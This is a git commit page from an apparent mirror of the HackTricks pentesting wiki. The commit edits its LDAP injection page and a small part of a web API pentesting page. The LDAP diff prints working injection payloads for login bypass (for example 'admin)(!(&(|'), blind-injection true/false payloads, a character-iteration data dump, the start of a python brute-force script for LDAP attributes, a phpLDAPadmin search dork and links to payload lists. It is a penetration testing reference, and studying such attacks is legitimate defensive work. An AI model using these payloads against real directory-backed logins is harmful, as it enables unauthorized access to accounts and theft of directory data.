0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] 2 pages and 4 assets modified

This commit is contained in:
CPol 2021-06-08 21:58:39 +00:00 committed by gitbook-bot
parent c2b98f8fb4
commit a24d4e91d6
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
6 changed files with 32 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
.gitbook/assets/image (535).png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 73 KiB

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (536).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (537).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
.gitbook/assets/image (538).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 205 KiB

45
pentesting-web/ldap-injection.md
View File

@ -27,30 +27,28 @@
**\(\|\)** = Absolute FALSE
For example:
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\)
\(&\(objectClass=user\)\(uid=\*\)\)
`(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))`
You can access to the database, and this can content information of a lot of different types.
The backups of LDAP uses the extension _ldif_
**OpenLDAP**: If 2 filters arrive, only executes the first one.
**ADAM or Microsoft LDS**: With 2 filters they throw an error.
**SunOne Directory Server 5.0**: Execute both filters.
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
The filter has to start with: _&_ or _\|_
Example: _\(&\(directory=val1\)\(folder=public\)\)_
The filter has to start with: `&` or `|`
Example: `(&(directory=val1)(folder=public))`
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\)
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_
`(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\).
Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
## Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
```bash
user=*
@ -92,7 +90,7 @@ password=pwd
```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True.
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```
```bash
@ -107,12 +105,29 @@ password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
### Lists
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
## Blind LDAP Injection
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```
```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
### Dump data
You can iterate over the ascii letters, digits and symbols:
```bash
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\*
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
```python
#!/usr/bin/python3
@ -189,5 +204,7 @@ for i in range(50):
intitle:"phpLDAPadmin" inurl:cmd.php
```
## More Payloads
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)

2
pentesting/pentesting-web/web-api-pentesting.md
View File

@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
![](../../.gitbook/assets/image%20%28535%29.png)
![](../../.gitbook/assets/image%20%28537%29.png)
### Check Access